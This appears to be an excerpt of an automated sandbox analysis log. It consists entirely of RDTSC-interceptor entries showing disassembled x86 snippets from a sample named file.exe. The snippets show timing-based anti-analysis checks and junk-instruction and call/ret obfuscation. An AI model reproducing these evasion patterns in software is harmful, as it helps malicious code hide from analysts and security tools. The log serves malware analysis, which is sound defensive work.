Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AED9D8 second address: AEDA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F620450A748h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f je 00007F620450A746h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F620450A748h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 push 00000000h 0x00000033 mov esi, dword ptr [ebp+122D2E8Eh] 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEDA1F second address: AEDA23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF377E second address: AF3784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF3784 second address: AF3815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bx, 5B89h 0x0000000d mov edi, ecx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F6204BE6478h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b or di, EFB6h 0x00000030 jnl 00007F6204BE6481h 0x00000036 pushad 0x00000037 sub edx, 391EA3B2h 0x0000003d and dl, FFFFFFD2h 0x00000040 popad 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007F6204BE6478h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d mov edi, dword ptr [ebp+122D2DD2h] 0x00000063 xchg eax, esi 0x00000064 jmp 00007F6204BE647Ah 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c je 00007F6204BE6482h 0x00000072 jmp 00007F6204BE647Ch 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF4865 second address: AF486B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF486B second address: AF486F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF486F second address: AF4873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AECC4F second address: AECC53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF9EEC second address: AF9F03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F620450A746h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFAF60 second address: AFAF65 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFD517 second address: AFD596 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F620450A74Bh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F620450A748h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 and bx, B159h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F620450A748h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 push 00000000h 0x0000004b xor dword ptr [ebp+122D5910h], eax 0x00000051 push eax 0x00000052 pushad 0x00000053 jmp 00007F620450A74Fh 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFD596 second address: AFD59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF4A0B second address: AF4A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF8265 second address: AF8269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF4A11 second address: AF4A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F620450A751h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFF4B1 second address: AFF4E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, eax 0x0000000c push 00000000h 0x0000000e jne 00007F6204BE6481h 0x00000014 push 00000000h 0x00000016 jno 00007F6204BE6477h 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6204BE647Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF91AC second address: AF91B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFA08D second address: AFA091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF8269 second address: AF827A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A74Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB16B second address: AFB170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF4A2B second address: AF4A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F620450A753h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFF4E6 second address: AFF4FC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6204BE6478h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F6204BE6476h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF827A second address: AF827F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB170 second address: AFB189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6204BE6485h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF4A42 second address: AF4A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF827F second address: AF828B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFB253 second address: AFB25D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F620450A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B02618 second address: B0261C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0261C second address: B02622 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B05C26 second address: B05C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B05C2A second address: B05C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a js 00007F620450A748h 0x00000010 mov ebx, edi 0x00000012 push ecx 0x00000013 clc 0x00000014 pop ebx 0x00000015 push 00000000h 0x00000017 and ebx, dword ptr [ebp+122D2A4Fh] 0x0000001d push 00000000h 0x0000001f jmp 00007F620450A756h 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 pushad 0x00000027 push esi 0x00000028 pop esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C35C second address: B0C360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C360 second address: B0C364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C490 second address: B0C495 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C609 second address: B0C639 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F620450A753h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F620450A752h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFE6B9 second address: AFE6CB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6204BE6476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F6204BE647Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFE6CB second address: AFE6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F620450A752h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B016D7 second address: B016E1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6204BE6476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B028CD second address: B028E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007F620450A754h 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F620450A746h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B017BB second address: B017BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B017BF second address: B017C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B017C3 second address: B017C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B017C9 second address: B017D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F620450A74Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B05E98 second address: B05E9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B04DB4 second address: B04DBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1330A second address: B13310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13310 second address: B1331A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F620450A746h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1331A second address: B13333 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6204BE6476h 0x00000008 jng 00007F6204BE6476h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 je 00007F6204BE6476h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13C97 second address: B13C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13D93 second address: B13D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6204BE6476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13D9D second address: B13DE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A757h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c je 00007F620450A755h 0x00000012 jmp 00007F620450A74Fh 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F620450A74Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1815F second address: B18169 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B182B9 second address: B182BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18543 second address: B18558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6204BE647Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18558 second address: B1855D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18808 second address: B18816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F6204BE6476h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E327 second address: B1E32D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3228 second address: AA3232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6204BE6476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1CD3A second address: B1CD3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1CD3E second address: B1CD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1DCEE second address: B1DCF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1DCF3 second address: B1DD0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F6204BE6476h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1DD0A second address: B1DD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1FD31 second address: B1FD35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2835D second address: B28369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F620450A746h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B28609 second address: B2860D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2860D second address: B28611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B28AE4 second address: B28AEE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6204BE6476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B28AEE second address: B28B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F620450A758h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B29075 second address: B29085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jo 00007F6204BE6482h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B29085 second address: B2908B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5F7F second address: AE5F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5F83 second address: AE5F89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5F89 second address: ACC358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6488h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F6204BE6478h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D2C46h] 0x0000002c call dword ptr [ebp+122D38DCh] 0x00000032 pushad 0x00000033 jmp 00007F6204BE647Ch 0x00000038 jp 00007F6204BE647Eh 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6415 second address: AE643F instructions: 0x00000000 rdtsc 0x00000002 je 00007F620450A74Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F620450A757h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6516 second address: AE651A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE65F6 second address: AE6673 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F620450A74Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 76B3E505h 0x00000014 jmp 00007F620450A759h 0x00000019 mov dword ptr [ebp+122D32C5h], edi 0x0000001f call 00007F620450A749h 0x00000024 jmp 00007F620450A758h 0x00000029 push eax 0x0000002a jmp 00007F620450A755h 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 push eax 0x00000034 push edx 0x00000035 push esi 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6673 second address: AE6678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6678 second address: AE667E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6976 second address: AE6993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6204BE6489h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6993 second address: AE69B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F620450A74Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 pushad 0x00000014 jnc 00007F620450A746h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE69B6 second address: AE69C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push esi 0x00000009 pushad 0x0000000a jg 00007F6204BE6476h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6F84 second address: AE6F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6F8A second address: AE6F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6F8E second address: AE7017 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F620450A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F620450A748h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 adc dx, 21E9h 0x0000002e push 0000001Eh 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F620450A748h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D323Ah], esi 0x00000050 mov dword ptr [ebp+1245A119h], ecx 0x00000056 nop 0x00000057 push eax 0x00000058 jmp 00007F620450A755h 0x0000005d pop eax 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jnc 00007F620450A74Ch 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7156 second address: AE715A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE715A second address: AE715E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7315 second address: AE7332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F6204BE6476h 0x00000009 jl 00007F6204BE6476h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F6204BE6478h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7332 second address: AE7337 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7337 second address: AE734E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e je 00007F6204BE6476h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE74B4 second address: AE74BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
